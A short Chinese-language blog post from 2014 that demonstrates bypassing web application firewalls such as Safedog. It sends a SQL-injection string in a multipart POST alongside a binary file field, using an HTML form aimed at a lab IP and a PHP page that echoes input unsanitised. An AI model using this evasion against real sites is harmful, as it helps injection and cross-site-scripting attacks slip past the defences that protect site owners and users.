A-A+

轻松绕各种WAF的POST注入、跨站防御(比如安全狗)

2014年04月04日 渗透测试 暂无评论 阅读 1,815 次

XXX之前有提过multipart请求绕过各种WAF方式:360网站宝/安全宝/加速乐及其他类似产品防护绕过缺陷之一,貌似没引起多少人关注。今天发现安全狗变聪明了以前那套他不吃了,不过随手给狗提交了一个二进制的文件域就XXOO了。注意一定要是二进制文件,图片、压缩包什么的都行。

构建如下HTML表单:

  1. <!DOCTYPE html>
  2. <html>
  3. <head>
  4. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
  5. <title>yzmm - p2j.cn</title>
  6. </head>
  7. <body>
  8.     <form action="http://192.168.199.151/index.php" method="POST" enctype="multipart/form-data">
  9.        File:<input type="file" name="file" /><br/>
  10.         ID:<input type="text" name="id" value="select 1 from mysql.user--" style="width:250px;" / ><br/>
  11.         <input type="submit" value="提交" />
  12.     </form>
  13. </body>
  14. </html>

index.php:

  1. <?php
  2.     echo "POST-ID:".$_POST['id']."<br/>GET-ID:".$_GET['id'];
  3. ?>

提交如下请求:

safedog

提交带二进制文件的请求:

post

成功绕过。

文章作者:园长

标签:

给我留言